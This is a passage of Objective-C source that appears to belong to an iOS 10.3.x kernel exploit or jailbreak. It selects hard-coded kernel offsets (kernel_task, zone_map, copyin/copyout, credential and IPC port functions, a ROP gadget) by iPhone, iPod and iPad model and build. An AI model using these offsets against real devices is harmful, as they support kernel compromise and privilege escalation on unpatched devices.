OFFSET_IPC_KOBJECT_SET =0xfffffff0070b9374; 150 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5c40; 151 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744d6ac; 152 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006404a84; 153 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 154 | 155 | } 156 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 157 | { 158 | OFFSET_ZONE_MAP =0xfffffff007558478; 159 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 160 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 161 | OFFSET_REALHOST =0xfffffff00753aba0; 162 | OFFSET_COPYIN =0xfffffff00718d37c; 163 | OFFSET_COPYOUT =0xfffffff00718d570; 164 | OFFSET_CHGPROCCNT =0xfffffff00739aab4; 165 | OFFSET_KAUTH_CRED_REF =0xfffffff007374e6c; 166 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 167 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 168 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 169 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744dc40; 170 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006400a84; 171 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 172 | } 173 | else if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) 174 | { 175 | OFFSET_ZONE_MAP =0xfffffff007558478; 176 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 177 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 178 | OFFSET_REALHOST =0xfffffff00753aba0; 179 | OFFSET_COPYIN =0xfffffff00718d028; 180 | OFFSET_COPYOUT =0xfffffff00718d21c; 181 | OFFSET_CHGPROCCNT =0xfffffff00739aa04; 182 | OFFSET_KAUTH_CRED_REF =0xfffffff007374d90; 183 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 184 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 185 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 186 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744db90; 187 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006400a84; 188 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 189 | 190 | } 191 | } 192 | 193 | 194 | //6S 10.3.3 195 | else if (strcmp(u.machine, "iPhone8,1") == 0 || strcmp(u.machine, "iPhone8,2") == 0) 196 | { 197 | if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) 198 | { 199 | OFFSET_ZONE_MAP =0xfffffff007548478; 200 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 201 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 202 | OFFSET_REALHOST =0xfffffff00752aba0; 203 | OFFSET_COPYIN =0xfffffff0071803a0; 204 | OFFSET_COPYOUT =0xfffffff007180594; 205 | OFFSET_CHGPROCCNT =0xfffffff00738d894; 206 | OFFSET_KAUTH_CRED_REF =0xfffffff007367c18; 207 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099e94; 208 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad16c; 209 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070999b8; 210 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007440a20; 211 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063b0a84; 212 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 213 | 214 | } 215 | else if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 216 | { 217 | OFFSET_ZONE_MAP =0xfffffff007548478; 218 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 219 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 220 | OFFSET_REALHOST =0xfffffff00752aba0; 221 | OFFSET_COPYIN =0xfffffff007180720; 222 | OFFSET_COPYOUT =0xfffffff007180914; 223 | OFFSET_CHGPROCCNT =0xfffffff00738d61c; 224 | OFFSET_KAUTH_CRED_REF =0xfffffff0073679b4; 225 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099efc; 226 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad154; 227 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a20; 228 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744053c; 229 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063b4a84; 230 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 231 | } 232 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 233 | { 234 | 235 | OFFSET_ZONE_MAP =0xfffffff007548478; 236 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 237 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 238 | OFFSET_REALHOST =0xfffffff00752aba0; 239 | OFFSET_COPYIN =0xfffffff0071806f4; 240 | OFFSET_COPYOUT =0xfffffff0071808e8; 241 | OFFSET_CHGPROCCNT =0xfffffff00738d944; 242 | OFFSET_KAUTH_CRED_REF =0xfffffff007367cf4; 243 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099e94; 244 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad16c; 245 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070999b8; 246 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007440ad0; 247 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063b4a84; 248 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 249 | 250 | } 251 | else if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 252 | { 253 | OFFSET_ZONE_MAP =0xfffffff007548478; 254 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 255 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 256 | OFFSET_REALHOST =0xfffffff00752aba0; 257 | OFFSET_COPYIN =0xfffffff007180720; 258 | OFFSET_COPYOUT =0xfffffff007180914; 259 | OFFSET_CHGPROCCNT =0xfffffff00738d61c; 260 | OFFSET_KAUTH_CRED_REF =0xfffffff0073679b4; 261 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099efc; 262 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad154; 263 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a20; 264 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744053c; 265 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063b4a84; 266 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 267 | } 268 | 269 | } 270 | //SE 271 | else if (strcmp(u.machine, "iPhone8,4") == 0) 272 | { 273 | if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) 274 | { 275 | OFFSET_ZONE_MAP =0xfffffff007548478; 276 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 277 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 278 | OFFSET_REALHOST =0xfffffff00752aba0; 279 | OFFSET_COPYIN =0xfffffff0071803a0; 280 | OFFSET_COPYOUT =0xfffffff007180594; 281 | OFFSET_CHGPROCCNT =0xfffffff00738d894; 282 | OFFSET_KAUTH_CRED_REF =0xfffffff007367c18; 283 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099e94; 284 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad16c; 285 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070999b8; 286 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007440a20; 287 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063d0a84; 288 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 289 | } 290 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 291 | { 292 | OFFSET_ZONE_MAP =0xfffffff007548478; 293 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 294 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 295 | OFFSET_REALHOST =0xfffffff00752aba0; 296 | OFFSET_COPYIN =0xfffffff0071806f4; 297 | OFFSET_COPYOUT =0xfffffff0071808e8; 298 | OFFSET_CHGPROCCNT =0xfffffff00738d944; 299 | OFFSET_KAUTH_CRED_REF =0xfffffff007367cf4; 300 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099e94; 301 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad16c; 302 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070999b8; 303 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007440ad0; 304 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063d0a84; 305 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 306 | } 307 | else if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 308 | { 309 | OFFSET_ZONE_MAP =0xfffffff007548478; 310 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 311 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 312 | OFFSET_REALHOST =0xfffffff00752aba0; 313 | OFFSET_COPYIN =0xfffffff007180720; 314 | OFFSET_COPYOUT =0xfffffff007180914; 315 | OFFSET_CHGPROCCNT =0xfffffff00738d61c; 316 | OFFSET_KAUTH_CRED_REF =0xfffffff0073679b4; 317 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099efc; 318 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad154; 319 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a20; 320 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744053c; 321 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063d0a84; 322 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 323 | 324 | } 325 | if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 326 | { 327 | OFFSET_ZONE_MAP =0xfffffff007548478; 328 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 329 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 330 | OFFSET_REALHOST =0xfffffff00752aba0; 331 | OFFSET_COPYIN =0xfffffff007180720; 332 | OFFSET_COPYOUT =0xfffffff007180914; 333 | OFFSET_CHGPROCCNT =0xfffffff00738d61c; 334 | OFFSET_KAUTH_CRED_REF =0xfffffff0073679b4; 335 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099efc; 336 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad154; 337 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a20; 338 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744053c; 339 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063d0a84; 340 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 341 | } 342 | } 343 | 344 | //7 345 | else if (strcmp(u.machine, "iPhone9,1") == 0 || strcmp(u.machine, "iPhone9,2") == 0 || strcmp(u.machine, "iPhone9,3") == 0 || strcmp(u.machine, "iPhone9,4") == 0) 346 | { 347 | if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) 348 | { 349 | OFFSET_ZONE_MAP =0xfffffff007590478; 350 | OFFSET_KERNEL_MAP =0xfffffff0075ec050; 351 | OFFSET_KERNEL_TASK =0xfffffff0075ec048; 352 | OFFSET_REALHOST =0xfffffff007572ba0; 353 | OFFSET_COPYIN =0xfffffff0071c5db4; 354 | OFFSET_COPYOUT =0xfffffff0071c6094; 355 | OFFSET_CHGPROCCNT =0xfffffff0073d38e4; 356 | OFFSET_KAUTH_CRED_REF =0xfffffff0073adc68; 357 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070deff4; 358 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070f22cc; 359 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070deb18; 360 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007486a14; 361 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006310a84; 362 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075ec0b0; 363 | } 364 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 365 | { 366 | 367 | OFFSET_ZONE_MAP =0xfffffff007590478; 368 | OFFSET_KERNEL_MAP =0xfffffff0075ec050; 369 | OFFSET_KERNEL_TASK =0xfffffff0075ec048; 370 | OFFSET_REALHOST =0xfffffff007572ba0; 371 | OFFSET_COPYIN =0xfffffff0071c6108; 372 | OFFSET_COPYOUT =0xfffffff0071c63e8; 373 | OFFSET_CHGPROCCNT =0xfffffff0073d3994; 374 | OFFSET_KAUTH_CRED_REF =0xfffffff0073add44; 375 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070deff4; 376 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070f22cc; 377 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070deb18; 378 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007486ac4; 379 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006314a84; 380 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075ec0b0; 381 | 382 | } 383 | else if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 384 | { 385 | 386 | OFFSET_ZONE_MAP =0xfffffff007590478; 387 | OFFSET_KERNEL_MAP =0xfffffff0075ec050; 388 | OFFSET_KERNEL_TASK =0xfffffff0075ec048; 389 | OFFSET_REALHOST =0xfffffff007572ba0; 390 | OFFSET_COPYIN =0xfffffff0071c6134; 391 | OFFSET_COPYOUT =0xfffffff0071c6414; 392 | OFFSET_CHGPROCCNT =0xfffffff0073d366c; 393 | OFFSET_KAUTH_CRED_REF =0xfffffff0073ada04; 394 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070df05c; 395 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070f22b4; 396 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070deb80; 397 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007486530; 398 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006314a84; 399 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075ec0b0; 400 | 401 | } 402 | else if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 403 | { 404 | 405 | OFFSET_ZONE_MAP =0xfffffff007590478; 406 | OFFSET_KERNEL_MAP =0xfffffff0075ec050; 407 | OFFSET_KERNEL_TASK =0xfffffff0075ec048; 408 | OFFSET_REALHOST =0xfffffff007572ba0; 409 | OFFSET_COPYIN =0xfffffff0071c6134; 410 | OFFSET_COPYOUT =0xfffffff0071c6414; 411 | OFFSET_CHGPROCCNT =0xfffffff0073d366c; 412 | OFFSET_KAUTH_CRED_REF =0xfffffff0073ada04; 413 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070df05c; 414 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070f22b4; 415 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070deb80; 416 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007486530; 417 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006314a84; 418 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075ec0b0; 419 | 420 | } 421 | } 422 | //iPod 6 423 | else if (strcmp(u.machine, "iPod7,1") == 0) 424 | { 425 | if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 426 | { 427 | OFFSET_ZONE_MAP =0xfffffff007558478; 428 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 429 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 430 | OFFSET_REALHOST =0xfffffff00753aba0; 431 | OFFSET_COPYIN =0xfffffff00718d3a8; 432 | OFFSET_COPYOUT =0xfffffff00718d59c; 433 | OFFSET_CHGPROCCNT =0xfffffff00739a78c; 434 | OFFSET_KAUTH_CRED_REF =0xfffffff007374b2c; 435 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a611c; 436 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b9374; 437 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5c40; 438 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744d6ac; 439 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00646ca84; 440 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 441 | 442 | } 443 | else if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 444 | { 445 | OFFSET_ZONE_MAP =0xfffffff007558478; 446 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 447 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 448 | OFFSET_REALHOST =0xfffffff00753aba0; 449 | OFFSET_COPYIN =0xfffffff00718d3a8; 450 | OFFSET_COPYOUT =0xfffffff00718d59c; 451 | OFFSET_CHGPROCCNT =0xfffffff00739a78c; 452 | OFFSET_KAUTH_CRED_REF =0xfffffff007374b2c; 453 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a611c; 454 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b9374; 455 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5c40; 456 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744d6ac; 457 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00646ca84; 458 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 459 | 460 | } 461 | else if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) 462 | { 463 | OFFSET_ZONE_MAP =0xfffffff007558478; 464 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 465 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 466 | OFFSET_REALHOST =0xfffffff00753aba0; 467 | OFFSET_COPYIN =0xfffffff00718d028; 468 | OFFSET_COPYOUT =0xfffffff00718d21c; 469 | OFFSET_CHGPROCCNT =0xfffffff00739aa04; 470 | OFFSET_KAUTH_CRED_REF =0xfffffff007374d90; 471 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 472 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 473 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 474 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744db90; 475 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006468a84; 476 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 477 | } 478 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 479 | { 480 | OFFSET_ZONE_MAP =0xfffffff007558478; 481 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 482 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 483 | OFFSET_REALHOST =0xfffffff00753aba0; 484 | OFFSET_COPYIN =0xfffffff00718d37c; 485 | OFFSET_COPYOUT =0xfffffff00718d570; 486 | OFFSET_CHGPROCCNT =0xfffffff00739aab4; 487 | OFFSET_KAUTH_CRED_REF =0xfffffff007374e6c; 488 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 489 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 490 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 491 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744dc40; 492 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00646ca84; 493 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 494 | } 495 | } 496 | 497 | //iPad Pro 10.5" 498 | else if (strcmp(u.machine, "iPad7,3") == 0 || strcmp(u.machine, "iPad7,4") == 0) 499 | { 500 | if ([ver isEqual: @"Version 10.3.2 (Build 14F8089)"]) 501 | { 502 | OFFSET_ZONE_MAP =0xfffffff007590478; 503 | OFFSET_KERNEL_MAP =0xfffffff0075ec050; 504 | OFFSET_KERNEL_TASK =0xfffffff0075ec048; 505 | OFFSET_REALHOST =0xfffffff007572ba0; 506 | OFFSET_COPYIN =0xfffffff0071c6220; 507 | OFFSET_COPYOUT =0xfffffff0071c6500; 508 | OFFSET_CHGPROCCNT =0xfffffff0073d3bd8; 509 | OFFSET_KAUTH_CRED_REF =0xfffffff0073adf88; 510 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070df014; 511 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070f22ec; 512 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070deb38; 513 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007486d08; 514 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006244a84; 515 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075ec0b0; 516 | } 517 | else if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) { 518 | OFFSET_ZONE_MAP =0xfffffff007590478; 519 | OFFSET_KERNEL_MAP =0xfffffff0075ec050; 520 | OFFSET_KERNEL_TASK =0xfffffff0075ec048; 521 | OFFSET_REALHOST =0xfffffff007572ba0; 522 | OFFSET_COPYIN =0xfffffff0071c5ecc; 523 | OFFSET_COPYOUT =0xfffffff0071c61ac; 524 | OFFSET_CHGPROCCNT =0xfffffff0073d3b28; 525 | OFFSET_KAUTH_CRED_REF =0xfffffff0073adeac; 526 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070df014; 527 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070f22ec; 528 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070deb38; 529 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007486c58; 530 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006244a84; 531 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075ec0b0; 532 | } 533 | } 534 | //iPad Mini 3 535 | 536 | else if (strcmp(u.machine, "iPad4,7") == 0 || strcmp(u.machine, "iPad4,8") == 0 || strcmp(u.machine, "iPad4,9") == 0) { 537 | if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 538 | { 539 | OFFSET_ZONE_MAP =0xfffffff00754c478; 540 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 541 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 542 | OFFSET_REALHOST =0xfffffff00752eba0; 543 | OFFSET_COPYIN =0xfffffff007181218; 544 | OFFSET_COPYOUT =0xfffffff00718140c; 545 | OFFSET_CHGPROCCNT =0xfffffff00738e504; 546 | OFFSET_KAUTH_CRED_REF =0xfffffff0073688a4; 547 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f7c; 548 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1d4; 549 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099aa0; 550 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007441424; 551 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00640ca84; 552 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 553 | } 554 | else if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 555 | { 556 | OFFSET_ZONE_MAP =0xfffffff00754c478; 557 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 558 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 559 | OFFSET_REALHOST =0xfffffff00752eba0; 560 | OFFSET_COPYIN =0xfffffff007181218; 561 | OFFSET_COPYOUT =0xfffffff00718140c; 562 | OFFSET_CHGPROCCNT =0xfffffff00738e504; 563 | OFFSET_KAUTH_CRED_REF =0xfffffff0073688a4; 564 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f7c; 565 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1d4; 566 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099aa0; 567 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007441424; 568 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00640ca84; 569 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 570 | } 571 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 572 | { 573 | OFFSET_ZONE_MAP =0xfffffff00754c478; 574 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 575 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 576 | OFFSET_REALHOST =0xfffffff00752eba0; 577 | OFFSET_COPYIN =0xfffffff0071811ec; 578 | OFFSET_COPYOUT =0xfffffff0071813e0; 579 | OFFSET_CHGPROCCNT =0xfffffff00738e82c; 580 | OFFSET_KAUTH_CRED_REF =0xfffffff007368be4; 581 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f14; 582 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1ec; 583 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a38; 584 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff0074419b8; 585 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00640ca84; 586 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 587 | } 588 | else if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) 589 | { 590 | OFFSET_ZONE_MAP =0xfffffff00754c478; 591 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 592 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 593 | OFFSET_REALHOST =0xfffffff00752eba0; 594 | OFFSET_COPYIN =0xfffffff007180e98; 595 | OFFSET_COPYOUT =0xfffffff00718108c; 596 | OFFSET_CHGPROCCNT =0xfffffff00738e77c; 597 | OFFSET_KAUTH_CRED_REF =0xfffffff007368b08; 598 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f14; 599 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1ec; 600 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a38; 601 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007441908; 602 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006408a84; 603 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 604 | } 605 | } 606 | //iPad Mini 4 & iPad Air 2 607 | else if (strcmp(u.machine, "iPad5,1") == 0 || strcmp(u.machine, "iPad5,2") == 0 || strcmp(u.machine, "iPad5,3") == 0 || strcmp(u.machine, "iPad5,4") == 0) { 608 | if (strcmp(u.version, "Darwin Kernel Version 16.5.0: Thu Feb 23 23:22:54 PST 2017; root:xnu-3789.52.2~7/RELEASE_ARM64_T7000") == 0) { 609 | OFFSET_ZONE_MAP =0xfffffff007558478; 610 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 611 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 612 | OFFSET_REALHOST =0xfffffff00753aba0; 613 | OFFSET_COPYIN =0xfffffff00718d3a8; 614 | OFFSET_COPYOUT =0xfffffff00718d59c; 615 | OFFSET_CHGPROCCNT =0xfffffff00739a78c; 616 | OFFSET_KAUTH_CRED_REF =0xfffffff007374b2c; 617 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a611c; 618 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b9374; 619 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5c40; 620 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744d6ac; 621 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00639ca84; 622 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 623 | } 624 | else if (strcmp(u.version, "Darwin Kernel Version 16.5.0: Thu Feb 23 23:22:55 PST 2017; root:xnu-3789.52.2~7/RELEASE_ARM64_T7001") == 0) { 625 | OFFSET_ZONE_MAP =0xfffffff007558478; 626 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 627 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 628 | OFFSET_REALHOST =0xfffffff00753aba0; 629 | OFFSET_COPYIN =0xfffffff00718d4a0; 630 | OFFSET_COPYOUT =0xfffffff00718d694; 631 | OFFSET_CHGPROCCNT =0xfffffff00739a9b0; 632 | OFFSET_KAUTH_CRED_REF =0xfffffff007374d50; 633 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a611c; 634 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b9374; 635 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5c40; 636 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744d8d0; 637 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063a8a84; 638 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 639 | } 640 | else if (strcmp(u.version, "Darwin Kernel Version 16.6.0: Mon Apr 17 17:33:35 PDT 2017; root:xnu-3789.60.24~24/RELEASE_ARM64_T7000") == 0) { 641 | OFFSET_ZONE_MAP =0xfffffff007558478; 642 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 643 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 644 | OFFSET_REALHOST =0xfffffff00753aba0; 645 | OFFSET_COPYIN =0xfffffff00718d37c; 646 | OFFSET_COPYOUT =0xfffffff00718d570; 647 | 